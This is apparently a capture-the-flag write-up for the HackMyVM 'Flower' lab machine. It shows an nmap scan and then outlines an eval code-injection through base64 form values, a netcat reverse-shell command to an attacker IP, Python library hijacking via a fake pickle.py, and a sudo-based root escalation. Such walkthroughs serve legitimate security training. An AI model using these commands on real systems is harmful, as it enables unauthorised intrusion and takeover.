# HackMyVM-Flower
## NMAP
```
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-12 02:02 PKT
Nmap scan report for dominator.hmv (192.168.1.6)
Host is up (0.000079s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:8D:A3:F6 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds
```
## PORT 80
On running gobuster it seems that there is only an `index.php`
Looking at the source code of web page we see that value is actually a base64 encoded text
These value are being sent to the sever and the server might be using `eval` so there is an exploit to it by ecnoding the exploit as base64 and replacing it with the actual value.
To get a reverse shell encode `system('nc 192.168.1.8 2222 -e /bin/bash') ` to base64 and do the exact same thing
Now we know `diary.py` can be ran as user `rose` and we know that it is using python library named `pickle`
We can create a malicious library by the name of pickle.py and place it with diary.py because python searches for library in which it is being executed.
Doing a `sudo -l` again with rose
As `.plantbook` is writeable add `/bin/bash` to the file and then run as root